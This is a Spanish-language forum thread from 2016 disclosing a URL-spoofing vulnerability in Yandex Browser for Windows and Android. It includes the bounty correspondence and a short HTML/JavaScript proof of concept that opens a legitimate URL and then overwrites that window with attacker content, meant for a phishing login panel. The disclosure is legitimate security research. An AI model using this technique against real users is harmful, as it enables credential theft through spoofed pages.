URL Spoofing - Yandex Browser [Windows y Android]

Iniciado por Jimeno, Julio 27, 2016, 09:25:07 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 27, 2016, 09:25:07 AM
Buenas a todos.

Supongo que esteréis familiarizados ya con esta vulnerabilidad. En caso de que no lo estéis, se trata de conseguir que el navegador muestre una URL legítima (por ejemplo el login de Gmail) pero que realmente el usuario esté visitando el servidor del atacante o uno fraudulento.
Se puede aprovechar para muchos objetivos, a mí el principal que se me ocurre es mostrar un panel de login clonando el login de la página víctima. La víctima verá la URL legítima, pero realmente estará entregando sus credenciales al atacante.

Comenzamos por el navegador de Yandex (empresa que tiene Bug Bounty):

CitarEn el caso de Yandex ambas vulnerabilidades fueron reportadas y consideradas como duplicadas, es decir, otro investigador las ha reportado antes que yo. Si eres esa persona y deseas que elimine este post, contacta conmigo a través de Twitter y lo haré inmediatamente (@migueljimeno96).

Yandex Browser para Windows
(reporte enviado el 19 de Julio de 2016, 21:36)

Los pasos a seguir para falsificar la URL una vez el usuario visita la página fraudulenta son los siguientes:

  • Una vez la página ha cargado, se llama a una función de JS (en mi caso se llama a dicha función al pulsar un botón).
  • La función abre una nueva ventana utilizando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Dicha ventana cargará la URL que deseamos falsificar.
  • Utilizaremos entonces document.write sobre dicha ventana para colocar nuestro contenido fraudulento (panel de login por ejemplo).

De forma que el código será el siguiente:
Código: html5

<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
The page is being hosted in my server


De tal forma que al pulsar sobre el botón en el navegador ocurría lo siguiente:




Tras intercambiar unos cuantos correos con el equipo de seguridad de Yandex la respuesta final fue la siguiente:


CitarHello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!

Vasiliy Kuznetsov Yandex Security Team


Yandex Browser para Android
(reporte enviado el 19 de Julio de 2016, 18:41)

Los pasos a seguir fueron los mismos, de forma que la víctima veía lo siguiente:



Tras unos pocos días recibí los siguientes correos del equipo de seguridad:

Citar
Hello, Miguel Angel!
As for Android, I'll check it shortly because it look similar to one report we got the other day. I'll let you know in a few days.
Have a great weekend!

Citar
Hello, Miguel Angel!
I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

Enlace al writeup original: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos y espero que os haya gustado!
Contacto: @migueljimeno96 -
Julio 27, 2016, 10:36:40 AM #1
HOLA!!!

Muy buen trabajo Jimeno, lastima que no obtuviste la recompensa, aparte es una vuln bastante heavy para su sistema.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Imprimir
Ir Arriba Páginas1
Acciones del Usuario